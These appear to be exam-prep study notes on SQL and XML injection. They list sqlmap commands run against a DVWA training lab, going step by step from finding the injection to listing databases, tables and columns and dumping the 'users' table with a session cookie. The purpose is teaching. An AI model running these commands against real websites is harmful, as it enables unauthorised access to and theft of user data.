SQL and XML Injections

(OBJ 2.3 & 2.4)

Injection Attack

SQL (Structured Query Language) Injection

XML (Extensible Markup Language) Injection

Exam Tip:

Conducting an SQL Injection

Example using sqlmap -u command:

[user@localhost ~]$ sqlmap -u "website_url.../dvwa/vulnerabilities/sqli/?id=2&Submit=Submit# --cookie="security=low; PHPSESSID=ab289a1ba9fe..."

Example using sqlmap -u ... --dbs command:

[user@localhost ~]$ sqlmap -u "website_url.../dvwa/vulnerabilities/sqli/?id=2&Submit=Submit# --cookie="security=low; PHPSESSID=ab289a1ba9fe..." --dbs

Example using sqlmap -u ... -D ... command:

[user@localhost ~]$ sqlmap -u "website_url.../dvwa/vulnerabilities/sqli/?id=2&Submit=Submit# --cookie="security=low; PHPSESSID=ab289a1ba9fe..." -D dvwa --table

Example using sqlmap -u ... -D ... -T ... command:

[user@localhost ~]$ sqlmap -u "website_url.../dvwa/vulnerabilities/sqli/?id=2&Submit=Submit# --cookie="security=low; PHPSESSID=ab289a1ba9fe..." -D dvwa -T users --columns

Example using sqlmap -u ... -D ... -T ... command:

[user@localhost ~]$ sqlmap -u "website_url.../dvwa/vulnerabilities/sqli/?id=2&Submit=Submit# --cookie="security=low; PHPSESSID=ab289a1ba9fe..." -D dvwa -T users --dump